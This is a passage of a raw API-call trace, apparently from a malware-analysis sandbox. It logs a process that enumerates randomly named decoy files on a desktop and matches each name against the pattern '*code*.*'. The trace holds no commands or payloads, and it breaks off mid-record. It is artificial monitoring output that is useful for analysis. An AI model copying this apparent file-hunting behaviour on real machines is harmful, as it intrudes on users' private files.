hFindFile=0x7436e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34f22090, ftCreationTime.dwHighDateTime=0x1d7accf, ftLastAccessTime.dwLowDateTime=0x925b6d20, ftLastAccessTime.dwHighDateTime=0x1d7b04b, ftLastWriteTime.dwLowDateTime=0x925b6d20, ftLastWriteTime.dwHighDateTime=0x1d7b04b, nFileSizeHigh=0x0, nFileSizeLow=0x40eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Y_Iia0ILxn.gif", cAlternateFileName="Y_IIA0~1.GIF")) returned 1 [0110.949] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS" [0110.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\Y_Iia0ILxn.gif", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0110.949] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3b) returned 0x29a2e40 [0110.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\Y_Iia0ILxn.gif", cchWideChar=59, lpMultiByteStr=0x29a2e40, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS\\Y_Iia0ILxn.gif", lpUsedDefaultChar=0x0) returned 59 [0110.949] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2c90 [0110.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.949] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970dc0 [0110.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x3970dc0, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.949] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970628 [0110.949] PathMatchSpecW (pszFile="Y_Iia0ILxn.gif", pszSpec="*code*.*") returned 0 [0110.949] FindNextFileW (in: hFindFile=0x7436e0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34f22090, ftCreationTime.dwHighDateTime=0x1d7accf, ftLastAccessTime.dwLowDateTime=0x925b6d20, ftLastAccessTime.dwHighDateTime=0x1d7b04b, ftLastWriteTime.dwLowDateTime=0x925b6d20, ftLastWriteTime.dwHighDateTime=0x1d7b04b, nFileSizeHigh=0x0, nFileSizeLow=0x40eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Y_Iia0ILxn.gif", cAlternateFileName="Y_IIA0~1.GIF")) returned 0 [0110.949] FindClose (in: hFindFile=0x7436e0 | out: hFindFile=0x7436e0) returned 1 [0110.949] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04a0 [0110.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0110.950] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2c) returned 0x39700d0 [0110.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", cchWideChar=44, lpMultiByteStr=0x39700d0, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\p B1LdDcHaeS", lpUsedDefaultChar=0x0) returned 44 [0110.950] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.950] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970ea0 [0110.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970ea0, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.950] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970560 [0110.950] PathMatchSpecW (pszFile="p B1LdDcHaeS", pszSpec="*code*.*") returned 0 [0110.950] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89c892e0, ftCreationTime.dwHighDateTime=0x1d7a502, ftLastAccessTime.dwLowDateTime=0x959e5ed0, ftLastAccessTime.dwHighDateTime=0x1d7a5a5, ftLastWriteTime.dwLowDateTime=0x959e5ed0, ftLastWriteTime.dwHighDateTime=0x1d7a5a5, nFileSizeHigh=0x0, nFileSizeLow=0x12c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKW-syaNOG91rV.gif", cAlternateFileName="PKW-SY~1.GIF")) returned 1 [0110.950] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\PKW-syaNOG91rV.gif", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0110.950] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x32) returned 0x38ea4d8 [0110.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\PKW-syaNOG91rV.gif", cchWideChar=50, lpMultiByteStr=0x38ea4d8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\PKW-syaNOG91rV.gif", lpUsedDefaultChar=0x0) returned 50 [0110.950] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2c90 [0110.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.950] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970ea0 [0110.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970ea0, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.950] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970470 [0110.950] PathMatchSpecW (pszFile="PKW-syaNOG91rV.gif", pszSpec="*code*.*") returned 0 [0110.950] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6e0cbd0, ftCreationTime.dwHighDateTime=0x1d7a4cc, ftLastAccessTime.dwLowDateTime=0x9ce51cb0, ftLastAccessTime.dwHighDateTime=0x1d7a54b, ftLastWriteTime.dwLowDateTime=0x9ce51cb0, ftLastWriteTime.dwHighDateTime=0x1d7a54b, nFileSizeHigh=0x0, nFileSizeLow=0xdff5, dwReserved0=0x0, dwReserved1=0x0, cFileName="QjzdslaoFnrvJ.flv", cAlternateFileName="QJZDSL~1.FLV")) returned 1 [0110.950] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QjzdslaoFnrvJ.flv", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0110.950] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x31) returned 0x38ea558 [0110.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QjzdslaoFnrvJ.flv", cchWideChar=49, lpMultiByteStr=0x38ea558, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QjzdslaoFnrvJ.flv", lpUsedDefaultChar=0x0) returned 49 [0110.950] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2a98 [0110.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.951] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970c60 [0110.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970c60, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.951] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39704c0 [0110.951] PathMatchSpecW (pszFile="QjzdslaoFnrvJ.flv", pszSpec="*code*.*") returned 0 [0110.951] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d327160, ftCreationTime.dwHighDateTime=0x1d7aa85, ftLastAccessTime.dwLowDateTime=0x45629f70, ftLastAccessTime.dwHighDateTime=0x1d7ac63, ftLastWriteTime.dwLowDateTime=0x45629f70, ftLastWriteTime.dwHighDateTime=0x1d7ac63, nFileSizeHigh=0x0, nFileSizeLow=0x11a52, dwReserved0=0x0, dwReserved1=0x0, cFileName="QqfcEGsF2dGoVC.mp4", cAlternateFileName="QQFCEG~1.MP4")) returned 1 [0110.951] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QqfcEGsF2dGoVC.mp4", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0110.951] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x32) returned 0x38ea198 [0110.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QqfcEGsF2dGoVC.mp4", cchWideChar=50, lpMultiByteStr=0x38ea198, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\QqfcEGsF2dGoVC.mp4", lpUsedDefaultChar=0x0) returned 50 [0110.951] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2db0 [0110.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.951] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970f00 [0110.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970f00, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.951] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970358 [0110.951] PathMatchSpecW (pszFile="QqfcEGsF2dGoVC.mp4", pszSpec="*code*.*") returned 0 [0110.951] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7bf0caa0, ftCreationTime.dwHighDateTime=0x1d7af0e, ftLastAccessTime.dwLowDateTime=0xada19040, ftLastAccessTime.dwHighDateTime=0x1d7af75, ftLastWriteTime.dwLowDateTime=0xada19040, ftLastWriteTime.dwHighDateTime=0x1d7af75, nFileSizeHigh=0x0, nFileSizeLow=0x1311b, dwReserved0=0x0, dwReserved1=0x0, cFileName="SSkrbDuTIF.m4a", cAlternateFileName="SSKRBD~1.M4A")) returned 1 [0110.951] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SSkrbDuTIF.m4a", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0110.951] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2e) returned 0x39700d0 [0110.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SSkrbDuTIF.m4a", cchWideChar=46, lpMultiByteStr=0x39700d0, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SSkrbDuTIF.m4a", lpUsedDefaultChar=0x0) returned 46 [0110.951] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.952] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970cc0 [0110.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970cc0, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.952] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970448 [0110.952] PathMatchSpecW (pszFile="SSkrbDuTIF.m4a", pszSpec="*code*.*") returned 0 [0110.952] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x285d0430, ftCreationTime.dwHighDateTime=0x1d7aa27, ftLastAccessTime.dwLowDateTime=0xcfb35a10, ftLastAccessTime.dwHighDateTime=0x1d7ad22, ftLastWriteTime.dwLowDateTime=0xcfb35a10, ftLastWriteTime.dwHighDateTime=0x1d7ad22, nFileSizeHigh=0x0, nFileSizeLow=0xc05d, dwReserved0=0x0, dwReserved1=0x0, cFileName="StgqeHlfrw0.m4a", cAlternateFileName="STGQEH~1.M4A")) returned 1 [0110.952] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\StgqeHlfrw0.m4a", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0110.952] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2f) returned 0x39700d0 [0110.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\StgqeHlfrw0.m4a", cchWideChar=47, lpMultiByteStr=0x39700d0, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\StgqeHlfrw0.m4a", lpUsedDefaultChar=0x0) returned 47 [0110.952] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.952] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970d00 [0110.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970d00, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.952] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39705d8 [0110.952] PathMatchSpecW (pszFile="StgqeHlfrw0.m4a", pszSpec="*code*.*") returned 0 [0110.952] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cc60f70, ftCreationTime.dwHighDateTime=0x1d7a02f, ftLastAccessTime.dwLowDateTime=0xa9de71c0, ftLastAccessTime.dwHighDateTime=0x1d7a585, ftLastWriteTime.dwLowDateTime=0xa9de71c0, ftLastWriteTime.dwHighDateTime=0x1d7a585, nFileSizeHigh=0x0, nFileSizeLow=0x1280, dwReserved0=0x0, dwReserved1=0x0, cFileName="SWeD.odt", cAlternateFileName="")) returned 1 [0110.952] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SWeD.odt", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0110.952] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x28) returned 0x29a3258 [0110.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SWeD.odt", cchWideChar=40, lpMultiByteStr=0x29a3258, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SWeD.odt", lpUsedDefaultChar=0x0) returned 40 [0110.952] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x39700d0 [0110.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.952] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970e20 [0110.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970e20, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.952] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39704c0 [0110.952] PathMatchSpecW (pszFile="SWeD.odt", pszSpec="*code*.*") returned 0 [0110.952] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a932a00, ftCreationTime.dwHighDateTime=0x1d7a7f6, ftLastAccessTime.dwLowDateTime=0x6167a550, ftLastAccessTime.dwHighDateTime=0x1d7ae78, ftLastWriteTime.dwLowDateTime=0x6167a550, ftLastWriteTime.dwHighDateTime=0x1d7ae78, nFileSizeHigh=0x0, nFileSizeLow=0x9172, dwReserved0=0x0, dwReserved1=0x0, cFileName="UQk58h 9TQk7yvi7D.mkv", cAlternateFileName="UQK58H~1.MKV")) returned 1 [0110.953] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\UQk58h 9TQk7yvi7D.mkv", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0110.953] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x35) returned 0x38ea258 [0110.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\UQk58h 9TQk7yvi7D.mkv", cchWideChar=53, lpMultiByteStr=0x38ea258, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\UQk58h 9TQk7yvi7D.mkv", lpUsedDefaultChar=0x0) returned 53 [0110.953] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2e88 [0110.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.953] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970e40 [0110.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970e40, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.953] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39705d8 [0110.953] PathMatchSpecW (pszFile="UQk58h 9TQk7yvi7D.mkv", pszSpec="*code*.*") returned 0 [0110.953] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8827190, ftCreationTime.dwHighDateTime=0x1d7aa97, ftLastAccessTime.dwLowDateTime=0x8be18a00, ftLastAccessTime.dwHighDateTime=0x1d7ac64, ftLastWriteTime.dwLowDateTime=0x8be18a00, ftLastWriteTime.dwHighDateTime=0x1d7ac64, nFileSizeHigh=0x0, nFileSizeLow=0xefc6, dwReserved0=0x0, dwReserved1=0x0, cFileName="VAHC8zDa9SevTeoKicIh.docx", cAlternateFileName="VAHC8Z~1.DOC")) returned 1 [0110.953] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VAHC8zDa9SevTeoKicIh.docx", cchWideChar=57, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0110.953] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x39) returned 0x29a2b28 [0110.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VAHC8zDa9SevTeoKicIh.docx", cchWideChar=57, lpMultiByteStr=0x29a2b28, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VAHC8zDa9SevTeoKicIh.docx", lpUsedDefaultChar=0x0) returned 57 [0110.953] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2db0 [0110.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.953] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x12) returned 0x3970d00 [0110.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970d00, cchWideChar=9 | out: lpWideCharStr="*code*.*") returned 9 [0110.953] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706f0 [0110.953] PathMatchSpecW (pszFile="VAHC8zDa9SevTeoKicIh.docx", pszSpec="*code*.*") returned 0 [0110.953] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfeb7dc60, ftCreationTime.dwHighDateTime=0x1d7aa10, ftLastAccessTime.dwLowDateTime=0xa18851b0, ftLastAccessTime.dwHighDateTime=0x1d7ac6c, ftLastWriteTime.dwLowDateTime=0xa18851b0, ftLastWriteTime.dwHighDateTime=0x1d7ac6c, nFileSizeHigh=0x0, nFileSizeLow=0x10367, dwReserved0=0x0, dwReserved1=0x0, cFileName="VbI-8gh.mkv", cAlternateFileName="")) returned 1 [0110.953] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VbI-8gh.mkv", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0110.953] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2b) returned 0x39700d0 [0110.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VbI-8gh.mkv", cchWideChar=43, lpMultiByteStr=0x39700d0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VbI-8gh.mkv", lpUsedDefaultChar=0x0) returned 43 [0110.954] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0508 [0110.954] 